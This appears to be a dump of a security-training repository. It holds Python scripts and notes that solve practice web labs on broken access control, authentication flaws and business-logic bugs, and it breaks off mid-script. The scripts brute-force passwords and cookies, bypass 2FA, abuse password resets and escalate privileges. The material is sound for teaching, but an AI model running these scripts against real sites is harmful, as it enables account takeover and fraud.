| Target Goal - Retrieve the administrator's password and delete the user carlos. 4 | 5 | creds: wiener:peter 6 | 7 | Steps to exploit: 8 | 9 | 1. Log into the wiener account 10 | 2. Exploit access control vulnerability to obtain the administrator's password 11 | 3. Login as the administrator user 12 | 4. Delete the carlos user 13 | -------------------------------------------------------------------------------- /broken-access-control/lab-11/access-control-lab-11.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | from bs4 import BeautifulSoup 5 | import re 6 | 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 10 | 11 | def retrive_carlos_password(s, url): 12 | chat_url = url + "/download-transcript/1.txt" 13 | r = s.get(chat_url, verify=False, proxies=proxies) 14 | res = r.text 15 | if 'password' in res: 16 | print("(+) Found Carlos's password...") 17 | carlos_password = re.findall(r'password is (.*)\.', res) 18 | return carlos_password[0] 19 | else: 20 | print("(-) Could not find Carlos's password.") 21 | sys.exit(-1) 22 | 23 | def get_csrf_token(s, url): 24 | r = s.get(url, verify=False, proxies=proxies) 25 | soup = BeautifulSoup(r.text, 'html.parser') 26 | csrf = soup.find("input", {'name': 'csrf'})['value'] 27 | return csrf 28 | 29 | def carlos_login(s, url, password): 30 | 31 | # Get CSRF token from the login page 32 | login_url = url + "/login" 33 | csrf_token = get_csrf_token(s, login_url) 34 | 35 | # Login as the carlos user 36 | print("(+) Logging in as the Carlos user...") 37 | data_login = {"username": "carlos", "password": password, "csrf": csrf_token} 38 | r = s.post(login_url, data=data_login, verify=False, proxies=proxies) 39 | res = r.text 40 | if "Log out" in res: 41 | print("(+) Successfully logged in as the carlos user.") 42 | else: 43 | print("(-) Could not login as the Carlos user.") 44 | sys.exit(-1) 45 | 46 | def main(): 47 | if len(sys.argv) != 2: 48 | print("(+) Usage: %s " % sys.argv[0]) 49 | print("(+) Example: %s www.example.com" % sys.argv[0]) 50 | sys.exit(-1) 51 | 52 | s = requests.Session() 53 | url = sys.argv[1] 54 | carlos_password = retrive_carlos_password(s, url) 55 | 56 | print("(+) Logging into Carlos's account...") 57 | carlos_login(s, url, carlos_password) 58 | 59 | 60 | if __name__ == "__main__": 61 | main() -------------------------------------------------------------------------------- /broken-access-control/lab-11/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #11 - Insecure direct object references 2 | 3 | Target Goal - Find the Carlos user password and log into his account. 4 | 5 | 6 | Steps to exploit: 7 | -------------------------------------------------------------------------------- /broken-access-control/lab-12/access-control-lab-12.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | from bs4 import BeautifulSoup 5 | import re 6 | 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 10 | 11 | def upgrade_wiener_user(s, url): 12 | 13 | # login as the wiener user 14 | login_url = url + '/login' 15 | data_login = {'username': 'wiener', 'password': 'peter'} 16 | r = s.post(login_url, data=data_login, verify=False, proxies=proxies) 17 | res = r.text 18 | if "Log out" in res: 19 | print("(+) Successfully logged in as the wiener user...") 20 | 21 | # Upgrade the user to administrator 22 | print("(+) Upgrading user to administrator...") 23 | upgrade_url = url + "/admin-roles" 24 | data_upgrade = {'action': 'upgrade', 'confirmed': 'true', 'username': 'wiener'} 25 | r = s.post(upgrade_url, data=data_upgrade, verify=False, proxies=proxies) 26 | if r.status_code == 200: 27 | print("(+) Successfully upgraded user to administrator.") 28 | else: 29 | print("(-) Could not upgrade user to administrator.") 30 | sys.exit(-1) 31 | 32 | else: 33 | print("(-) Could not login as the wiener user.") 34 | sys.exit(-1) 35 | 36 | def main(): 37 | if len(sys.argv) != 2: 38 | print("(+) Usage: %s " % sys.argv[0]) 39 | print("(+) Example: %s www.example.com" % sys.argv[0]) 40 | sys.exit(-1) 41 | 42 | s = requests.Session() 43 | url = sys.argv[1] 44 | upgrade_wiener_user(s, url) 45 | 46 | if __name__ == "__main__": 47 | main() -------------------------------------------------------------------------------- /broken-access-control/lab-12/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #12 - Multi-step process with no access control on one step 2 | 3 | Target Goal - Exploit the access control flaw to promote the wiener user to administrator 4 | 5 | creds: administrator:admin, wiener:peter 6 | 7 | Steps to exploit: -------------------------------------------------------------------------------- /broken-access-control/lab-13/access-control-lab-13.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | from bs4 import BeautifulSoup 5 | import re 6 | 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 10 | 11 | def upgrade_wiener_user(s, url): 12 | 13 | # Login as the wiener user 14 | login_url = url + '/login' 15 | data_login = {'username': 'wiener', 'password': 'peter'} 16 | r = s.post(login_url, data=data_login, verify=False, proxies=proxies) 17 | res = r.text 18 | if 'Log out' in res: 19 | print("(+) Successfully logged in as the wiener user...") 20 | 21 | # Upgrade the user 22 | print("(+) Upgrading user to administrator...") 23 | upgrade_url = url + '/admin-roles?username=wiener&action=upgrade' 24 | headers = {'Referer': url + '/admin'} 25 | r = s.get(upgrade_url, headers=headers, verify=False, proxies=proxies) 26 | if r.status_code == 200: 27 | print("(+) Successfully upgraded user to administrator.") 28 | else: 29 | print("(-) Could not upgrade user to administrator.") 30 | sys.exit(-1) 31 | else: 32 | print("(-) Could not login as the wiener user.") 33 | sys.exit(-1) 34 | 35 | def main(): 36 | if len(sys.argv) != 2: 37 | print("(+) Usage: %s " % sys.argv[0]) 38 | print("(+) Example: %s www.example.com" % sys.argv[0]) 39 | sys.exit(-1) 40 | 41 | s = requests.Session() 42 | url = sys.argv[1] 43 | upgrade_wiener_user(s, url) 44 | 45 | if __name__ == "__main__": 46 | main() -------------------------------------------------------------------------------- /broken-access-control/lab-13/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #13 - Referer-based access control 2 | 3 | Target Goal - Promote the wiener user to administrator 4 | 5 | creds: adminstrator:admin, wiener:peter 6 | 7 | Steps to exploit: -------------------------------------------------------------------------------- /broken-access-control/theory/Broken Access Control Complete Guide Theory Video Slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rkhal101/Web-Security-Academy-Series/ad800b5dc2649815692b90b892dee474f82701f8/broken-access-control/theory/Broken Access Control Complete Guide Theory Video Slides.pdf -------------------------------------------------------------------------------- /broken-authentication/lab-01/notes.txt: -------------------------------------------------------------------------------- 1 | Lab 1 - Username enumeration via different responses 2 | 3 | Target goal: Enumerate a valid username and password to access the application. 4 | 5 | username: arkansas -------------------------------------------------------------------------------- /broken-authentication/lab-02/authentication-lab-02.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | 5 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 6 | 7 | proxies = {'http': 'http://127.0.01:8080', 'https': 'http://127.0.0.1:8080'} 8 | 9 | def access_carlos_account(s, url): 10 | 11 | # Log into Carlos's account 12 | print("(+) Logging into Carlos's account and bypassing 2FA verification...") 13 | login_url = url + "/login" 14 | login_data = {"username": "carlos", "password": "montoya"} 15 | r = s.post(login_url, data=login_data, allow_redirects=False, verify=False, proxies=proxies) 16 | 17 | # Confirm bypass 18 | myaccount_url = url + "/my-account" 19 | r = s.get(myaccount_url, verify=False, proxies=proxies) 20 | if "Log out" in r.text: 21 | print("(+) Successfully bypassed 2FA verification.") 22 | else: 23 | print("(-) Exploit failed.") 24 | sys.exit(-1) 25 | 26 | def main(): 27 | if len(sys.argv) != 2: 28 | print("(+) Usage: %s " % sys.argv[0]) 29 | print("(+) Example: %s www.example.com" % sys.argv[0]) 30 | sys.exit(-1) 31 | 32 | s = requests.Session() 33 | url = sys.argv[1] 34 | access_carlos_account(s, url) 35 | 36 | if __name__ == "__main__": 37 | main() -------------------------------------------------------------------------------- /broken-authentication/lab-02/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #2 - 2FA simple bypass 2 | 3 | Target Goal - Bypass THE 2FA verification and access Carlos's account. 4 | 5 | Your credentials: wiener:peter 6 | Victim's credentials carlos:montoya 7 | -------------------------------------------------------------------------------- /broken-authentication/lab-03/authentication-lab-03.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | 5 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 6 | 7 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 8 | 9 | def access_carlos_account(s, url): 10 | 11 | # Reset Carlos's password 12 | print("(+) Resetting Carlos's password...") 13 | password_reset_url = url + "/forgot-password?temp-forgot-password-token=x" 14 | password_reset_data = {"temp-forgot-password-token": "x", "username": "carlos", "new-password-1": "password", "new-password-2": "password"} 15 | r = s.post(password_reset_url, data=password_reset_data, verify=False, proxies=proxies) 16 | 17 | # Access Carlos's account 18 | print("(+) Logging into Carlos's account...") 19 | login_url = url + "/login" 20 | login_data = {"username": "carlos", "password": "password"} 21 | r = s.post(login_url, data=login_data, verify=False, proxies=proxies) 22 | 23 | # Confirm exploit worked 24 | if "Log out" in r.text: 25 | print("(+) Successfully logged into Carlos's account.") 26 | else: 27 | print("(-) Exploit failed.") 28 | sys.exit(-1) 29 | 30 | def main(): 31 | if len(sys.argv) != 2: 32 | print("(+) Usage: %s " % sys.argv[0]) 33 | print("(+) Example: %s www.example.com" % sys.argv[0]) 34 | sys.exit(-1) 35 | 36 | s = requests.Session() 37 | url = sys.argv[1] 38 | access_carlos_account(s, url) 39 | 40 | if __name__ == "__main__": 41 | main() -------------------------------------------------------------------------------- /broken-authentication/lab-03/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #3 - Password reset broken logic 2 | 3 | Target Goal - Exploit password reset functionality to reset Carlos's password and access his account. 4 | 5 | Your credentials: wiener:peter 6 | Victim's username: carlos 7 | -------------------------------------------------------------------------------- /broken-authentication/lab-04/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #4 - Username enumeration via subtly different responses 2 | 3 | Target Goal - Enumerate a valid username and then brute-force the user's password. 4 | 5 | Analysis: 6 | 7 | username -> autodiscover 8 | password -> football -------------------------------------------------------------------------------- /broken-authentication/lab-05/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #5 - Username enumeration via response timing 2 | 3 | Target Goal - Enumerate a valid username and then brute-force the user's password. 4 | 5 | Your credentials: wiener:peter 6 | 7 | Analysis: -------------------------------------------------------------------------------- /broken-authentication/lab-06/authentication-lab-06-usernames.py: -------------------------------------------------------------------------------- 1 | print("###########The following are the usernames:###############") 2 | for i in range(150): 3 | if i % 3: 4 | print("carlos") 5 | else: 6 | print("wiener") 7 | 8 | 9 | print("##############The following are the passwords:############") 10 | with open('passwords.txt', 'r') as f: 11 | lines = f.readlines() 12 | 13 | i = 0 14 | for pwd in lines: 15 | if i % 3: 16 | print(pwd.strip('\n')) 17 | else: 18 | print("peter") 19 | print(pwd.strip('\n')) 20 | i = i+1 21 | i = i +1 22 | 23 | 24 | -------------------------------------------------------------------------------- /broken-authentication/lab-06/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #6 - Broken brute-force protection, IP block 2 | 3 | Target Goal - Brute force the victim's password 4 | 5 | Your credentials: wiener:peter 6 | Victim's username: carlos 7 | 8 | 9 | 10 | carlos 11 | carlos 12 | wiener 13 | carlos 14 | carlos 15 | 16 | 17 | 123456 18 | password 19 | peter 20 | 12345678 21 | qwerty -------------------------------------------------------------------------------- /broken-authentication/lab-07/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #7 - Username enumeration via account lock 2 | 3 | Target Goal - Exploit logic flaw to enumerate valid username and then brute-force user's password. 4 | -------------------------------------------------------------------------------- /broken-authentication/lab-08/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #8 - 2FA broken logic 2 | 3 | Target Goal - Exploit 2FA logic flaw to access Carlos's account. 4 | 5 | Your credentials: wiener:peter 6 | Victim's username: carlos 7 | 8 | Analysis: 9 | 10 | -------------------------------------------------------------------------------- /broken-authentication/lab-09/authentication-lab-09.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | import hashlib 5 | import base64 6 | 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 10 | 11 | def access_carlos_account(url): 12 | 13 | print("(+) Brute-forcing Carlos's password...") 14 | with open('passwords.txt', 'r') as file: 15 | for pwd in file: 16 | hashed_pwd = 'carlos:' + hashlib.md5(pwd.rstrip('\r\n').encode("utf-8")).hexdigest() 17 | encoded_pwd = base64.b64encode(bytes(hashed_pwd, "utf-8")) 18 | str_pwd = encoded_pwd.decode("utf-8") 19 | 20 | # perform the request 21 | r = requests.Session() 22 | myaccount_url = url + "/my-account" 23 | cookies = {'stay-logged-in': str_pwd} 24 | req = r.get(myaccount_url, cookies=cookies, verify=False, proxies=proxies) 25 | if "Log out" in req.text: 26 | print("(+) Carlos's password is: " + pwd) 27 | sys.exit(-1) 28 | print("(-) Could not find Carlos's password.") 29 | 30 | def main(): 31 | if len(sys.argv) !=2: 32 | print("(+) Usage: %s " % sys.argv[0]) 33 | print("(+) Example: %s www.example.com" % sys.argv[0]) 34 | sys.exit(-1) 35 | 36 | url = sys.argv[1] 37 | access_carlos_account(url) 38 | 39 | 40 | if __name__ == "__main__": 41 | main() -------------------------------------------------------------------------------- /broken-authentication/lab-09/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #9 - Brute-forcing a stay-logged-in cookie 2 | 3 | Target Goal - Obtain and brute force Carlos's cookie to gain access to his account. 4 | 5 | Your credentials: wiener:peter 6 | Victim's username: carlos 7 | 8 | base64(username:md5(password)) 9 | 10 | base64(carlos:md5(x)) -------------------------------------------------------------------------------- /broken-authentication/lab-10/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #10 - Offline password cracking 2 | 3 | Target Goal - Exploit XSS vulnerability to obtain Carlos's hashed password, crack it and delete his account. 4 | 5 | Your credentials: wiener:peter 6 | Victim's username: carlos 7 | -------------------------------------------------------------------------------- /broken-authentication/lab-11/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #11 - Password reset poisoning via middleware 2 | 3 | Target Goal - Exploit the vulnerability in the password reset functionality and access Carlos's account. 4 | 5 | Creds - wiener:peter 6 | 7 | -------------------------------------------------------------------------------- /broken-authentication/lab-12/authentication-lab-12.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | 5 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 6 | 7 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 8 | 9 | def access_carlos_account(s, url): 10 | 11 | print("(+) Logging into Wiener's account...") 12 | login_url = url + "/login" 13 | login_data = {"username": "wiener", "password": "peter"} 14 | r = s.post(login_url, data=login_data, verify=False, proxies=proxies) 15 | 16 | print("(+) Brute-forcing Carlos's password...") 17 | change_password_url = url + "/my-account/change-password" 18 | 19 | with open('passwords.txt', 'r') as f: 20 | lines = f.readlines() 21 | 22 | for pwd in lines: 23 | pwd = pwd.strip('\n') 24 | change_password_data = {"username":"carlos","current-password": pwd, "new-password-1": "password1", "new-password-2": "password2"} 25 | r = s.post(change_password_url, data=change_password_data, verify=False, proxies=proxies) 26 | if "New passwords do not match" in r.text: 27 | carlos_pwd = pwd 28 | print("(+) Found Carlos's password: " + carlos_pwd) 29 | break 30 | 31 | if carlos_pwd: 32 | # login 33 | login_data = {"username": "carlos", "password": carlos_pwd} 34 | r = requests.post(login_url, data=login_data, verify=False, proxies=proxies) 35 | if 'Log out' in r.text: 36 | print("(+) Successfully logged into Carlos's account.") 37 | else: 38 | print("(-) Could not log into Carlos's account.") 39 | sys.exit(-1) 40 | else: 41 | print("(-) Could not find Carlos's password.") 42 | sys.exit(-1) 43 | 44 | def main(): 45 | if len(sys.argv) !=2: 46 | print("(+) Usage: %s " % sys.argv[0]) 47 | print("(+) Example: %s www.example.com" % sys.argv[0]) 48 | sys.exit(-1) 49 | 50 | s = requests.Session() 51 | url = sys.argv[1] 52 | access_carlos_account(s, url) 53 | 54 | if __name__ == "__main__": 55 | main() -------------------------------------------------------------------------------- /broken-authentication/lab-12/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #12 - Password brute-force via password change 2 | 3 | Target Goal - Brute-force Carlos's password in the password change functionality. 4 | 5 | Your credentials: wiener:peter 6 | Victim's username: carlos 7 | 8 | 9 | new passwords don't match && current password is incorrect -> Current password is incorrect 10 | new passwords don't match && current password is correct -> New passwords do not match -------------------------------------------------------------------------------- /broken-authentication/lab-13/authentication-lab-13.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | import json 5 | 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | 8 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 9 | 10 | def access_carlos_account(s, url): 11 | 12 | print("(+) Exploiting vulnerability....") 13 | login_url = url + "/login" 14 | payload = {"username": "carlos", "password": ["123456","password","12345678","qwerty","123456789","12345","1234","111111","1234567","dragon","123123","baseball","abc123","football","monkey","letmein","shadow","master","666666","qwertyuiop","123321","mustang","1234567890","michael","654321","superman","1qaz2wsx","7777777","121212","000000","qazwsx","123qwe","killer","trustno1","jordan","jennifer","zxcvbnm","asdfgh","hunter","buster","soccer","harley","batman","andrew","tigger","sunshine","iloveyou","2000","charlie","robert","thomas","hockey","ranger","daniel","starwars","klaster","112233","george","computer","michelle","jessica","pepper","1111","zxcvbn","555555","11111111","131313","freedom","777777","pass","maggie","159753","aaaaaa","ginger","princess","joshua","cheese","amanda","summer","love","ashley","nicole","chelsea","biteme","matthew","access","yankees","987654321","dallas","austin","thunder","taylor","matrix","mobilemail","mom","monitor","monitoring","montana","moon","moscow","random"]} 15 | 16 | headers = {"Content-Type": "application/json"} 17 | 18 | r = s.post(login_url, json=payload, headers=headers, verify=False, proxies=proxies) 19 | 20 | if "Log out" in r.text: 21 | print("(+) Successfully accessed Carlos's account.") 22 | else: 23 | print("(-) Could not login to Carlos's account") 24 | sys.exit(-1) 25 | 26 | 27 | def main(): 28 | if len(sys.argv) != 2: 29 | print("(+) Usage: %s " % sys.argv[0]) 30 | print("(+) Example: %s www.example.com" % sys.argv[0]) 31 | sys.exit(-1) 32 | 33 | s = requests.Session() 34 | url = sys.argv[1] 35 | access_carlos_account(s, url) 36 | 37 | if __name__ == "__main__": 38 | main() -------------------------------------------------------------------------------- /broken-authentication/lab-13/convert-pwd-format.py: -------------------------------------------------------------------------------- 1 | print("[", end='') 2 | 3 | with open('passwords.txt', 'r') as f: 4 | lines = f.readlines() 5 | 6 | for pwd in lines: 7 | print('"' + pwd.rstrip("\n") + '",', end='') 8 | 9 | print('"random"]', end='') -------------------------------------------------------------------------------- /broken-authentication/lab-13/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #13 - Broken brute-force protection, multiple credentials per request 2 | 3 | Target Goal - Exploit logic flaw in the brute force protection mechanism and access Carlos's account. 4 | 5 | Victim's username: carlos 6 | 7 | Analysis: 8 | 9 | 10 | -------------------------------------------------------------------------------- /broken-authentication/lab-14/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #14 - 2FA bypass using a brute-force attack 2 | 3 | Target Goal - Brute-force the 2FA code and access Carlos's account page. 4 | 5 | Victim's credentials: carlos:montoya 6 | -------------------------------------------------------------------------------- /broken-authentication/theory/Authentication Vulnerabilities Complete Guide Theory Video Slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rkhal101/Web-Security-Academy-Series/ad800b5dc2649815692b90b892dee474f82701f8/broken-authentication/theory/Authentication Vulnerabilities Complete Guide Theory Video Slides.pdf -------------------------------------------------------------------------------- /business-logic-vulnerabilities/lab-01/business-logic-flaw-lab-01.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | from bs4 import BeautifulSoup 5 | import re 6 | 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 10 | 11 | def get_csrf_token(s, url): 12 | r = s.get(url, verify=False, proxies=proxies) 13 | soup = BeautifulSoup(r.text, 'html.parser') 14 | csrf = soup.find("input", {'name': 'csrf'})['value'] 15 | return csrf 16 | 17 | 18 | def buy_item(s, url): 19 | 20 | # Retrieve the CSRF token 21 | login_url = url + "/login" 22 | csrf_token = get_csrf_token(s, login_url) 23 | 24 | # Login as the wiener user 25 | print("(+) Logging in as the wiener user...") 26 | data_login = {"csrf": csrf_token, "username": "wiener", "password": "peter"} 27 | r = s.post(login_url, data=data_login, verify=False, proxies=proxies) 28 | res = r.text 29 | if "Log out" in res: 30 | print("(+) Successfully logged in as the wiener user.") 31 | 32 | # Add item to cart 33 | cart_url = url + "/cart" 34 | data_cart = {"productId": "1", "redir": "PRODUCT", "quantity": "1", "price": "1"} 35 | r = s.post(cart_url, data=data_cart, verify=False, proxies=proxies) 36 | 37 | # Checkout 38 | checkout_url = url + "/cart/checkout" 39 | checkout_csrf_token = get_csrf_token(s, cart_url) 40 | data_checkout = {"csrf": checkout_csrf_token} 41 | r = s.post(checkout_url, data=data_checkout, verify=False, proxies=proxies) 42 | 43 | # Check if we solved the lab 44 | if "Congratulations" in r.text: 45 | print("(+) Successfully exploited the business logic vulnerability.") 46 | else: 47 | print("(-) Could not exploit the business logic vulnerability.") 48 | sys.exit(-1) 49 | else: 50 | print("(-) Could not login as user.") 51 | 52 | 53 | def main(): 54 | if len(sys.argv) != 2: 55 | print("(+) Usage: %s " % sys.argv[0]) 56 | print("(+) Example: %s www.example.com" % sys.argv[0]) 57 | sys.exit(-1) 58 | 59 | s = requests.Session() 60 | url = sys.argv[1] 61 | buy_item(s, url) 62 | 63 | if __name__ == "__main__": 64 | main() -------------------------------------------------------------------------------- /business-logic-vulnerabilities/lab-01/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #1 - Excessive trust in client-side controls 2 | 3 | Target Goal - Exploit logic flaw to buy the Lightweight l33t leather jacket. 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | 1. Login as the user* 9 | 2. Add an item to the cart* 10 | 3. Purchase the item* 11 | 4. Confirm that we solved the lab -------------------------------------------------------------------------------- /business-logic-vulnerabilities/lab-02/business-logic-flaw-lab-02.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | from bs4 import BeautifulSoup 5 | import re 6 | 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 10 | 11 | def get_csrf_token(s, url): 12 | r = s.get(url, verify=False, proxies=proxies) 13 | soup = BeautifulSoup(r.text, 'html.parser') 14 | csrf = soup.find("input", {'name': 'csrf'})['value'] 15 | return csrf 16 | 17 | 18 | def buy_item(s, url): 19 | 20 | # Retrieve the CSRF token 21 | login_url = url + "/login" 22 | csrf_token = get_csrf_token(s, login_url) 23 | 24 | # Login as user 25 | print("(+) Logging in as the wiener user...") 26 | data_login = {"csrf": csrf_token, "username": "wiener", "password": "peter"} 27 | r = s.post(login_url, data=data_login, verify=False, proxies=proxies) 28 | res = r.text 29 | if "Log out" in res: 30 | print("(+) Successfully logged in as the wiener user...") 31 | 32 | # Add negative items 33 | cart_url = url + "/cart" 34 | data_cart = {"productId": "20", "redir": "PRODUCT", "quantity": "-16"} 35 | r = s.post(cart_url, data=data_cart, verify=False, proxies=proxies) 36 | 37 | # Add Jacket to cart 38 | cart_url = url + "/cart" 39 | data_cart = {"productId": "1", "redir": "PRODUCT", "quantity": "1"} 40 | r = s.post(cart_url, data=data_cart, verify=False, proxies=proxies) 41 | 42 | # Checkout 43 | checkout_url = url + "/cart/checkout" 44 | csrf_token = get_csrf_token(s, cart_url) 45 | data_checkout = {"csrf": csrf_token} 46 | r = s.post(checkout_url, data=data_checkout, verify=False, proxies=proxies) 47 | 48 | # Check if we solved the lab 49 | if "Congratulations" in r.text: 50 | print("(+) Successfully exploited the business logic vulnerability.") 51 | else: 52 | print("(-) Could not exploit the vulnerability.") 53 | sys.exit(-1) 54 | 55 | else: 56 | print("(-) Could not login as the user.") 57 | 58 | 59 | def main(): 60 | if len(sys.argv) !=2: 61 | print("(+) Usage: %s " % sys.argv[0]) 62 | print("(+) Example: %s www.example.com" % sys.argv[0]) 63 | sys.exit(-1) 64 | 65 | s = requests.Session() 66 | url =sys.argv[1] 67 | buy_item(s, url) 68 | 69 | if __name__ == "__main__": 70 | main() -------------------------------------------------------------------------------- /business-logic-vulnerabilities/lab-02/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #2 - High-level logic vulnerability 2 | 3 | Target Goal - Exploit logic flaw to buy the Lightweight l33t leather jacket. 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | 9 | 1. Login as the regular user* 10 | 2. Buying negative 14 items of the item that costed $95* 11 | 3. Buy the jacket* 12 | 4. Submit the request and confirm that we solved the lab -------------------------------------------------------------------------------- /business-logic-vulnerabilities/lab-03/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #3 - Inconsistent security controls 2 | 3 | Target Goal - Exploit logic flaw to access the admin panel and delete Carlos 4 | 5 | Analysis: 6 | 7 | 8 | -------------------------------------------------------------------------------- /business-logic-vulnerabilities/lab-04/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #4 - Flawed enforcement of business rules 2 | 3 | Target Goal - Exploit logic flaw to buy the Lightweight l33t leather jacket. 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | 9 | 10 | -------------------------------------------------------------------------------- /business-logic-vulnerabilities/lab-05/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #5 - Low-level logic flaw 2 | 3 | Target Goal - Exploit logic flaw to buy the Lightweight l33t leather jacket. 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | 9 | 10 | -------------------------------------------------------------------------------- /business-logic-vulnerabilities/lab-06/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #6 - Inconsistent handling of exceptional input 2 | 3 | Target Goal - Exploit logic flaw in the account registration process to gain access to the admin panel and delete Carlos. 4 | 5 | Analysis: 6 | 7 | 8 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 9 | 10 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@dontwannacry.com.exploit-0ab8003b04410bd6c1f7d9ed01a700ca.exploit-server.net 11 | 12 | 255 -17 = 238 -------------------------------------------------------------------------------- /business-logic-vulnerabilities/lab-07/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #7 - Weak isolation on dual-use endpoint 2 | 3 | Target Goal - Exploit logic flaw to gain access to the administrator account and delete carlos. 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | 9 | -------------------------------------------------------------------------------- /business-logic-vulnerabilities/lab-08/business-logic-flaw-lab-08.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | from bs4 import BeautifulSoup 5 | import re 6 | 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 10 | 11 | def get_csrf_token(s, url): 12 | r = s.get(url, verify=False, proxies=proxies) 13 | soup = BeautifulSoup(r.text, 'html.parser') 14 | csrf = soup.find("input", {'name': 'csrf'})['value'] 15 | return csrf 16 | 17 | def buy_item(s, url): 18 | 19 | # Retrieve the CSRF token 20 | login_url = url + "/login" 21 | csrf_token = get_csrf_token(s, login_url) 22 | 23 | # Login as the wiener user 24 | print("(+) Logging in as the wiener user...") 25 | data_login = {'csrf': csrf_token, 'username': 'wiener', 'password': 'peter'} 26 | r = s.post(login_url, data=data_login, verify=False, proxies=proxies) 27 | res = r.text 28 | if "Log out" in res: 29 | print("(+) Successfully logged in as the wiener user...") 30 | 31 | # Add item to cart 32 | cart_url = url + "/cart" 33 | data_cart = {'productId': '1', 'quantity': '1', 'redir': 'PRODUCT'} 34 | r = s.post(cart_url, data=data_cart, verify=False, proxies=proxies) 35 | 36 | # Confirm order / purchase item 37 | confirmation_url = url + '/cart/order-confirmation?order-confirmed=true' 38 | r = s.get(confirmation_url, verify=False, proxies=proxies) 39 | 40 | if 'Congratulations' in r.text: 41 | print("(+) Successfully exploited the business logic vulnerability") 42 | else: 43 | print("(-) Could not exploit the vulnerability.") 44 | sys.exit(-1) 45 | else: 46 | print("(-) Could not login as the wiener user.") 47 | sys.exit(-1) 48 | 49 | def main(): 50 | if len(sys.argv) != 2: 51 | print("(+) Usage: %s " 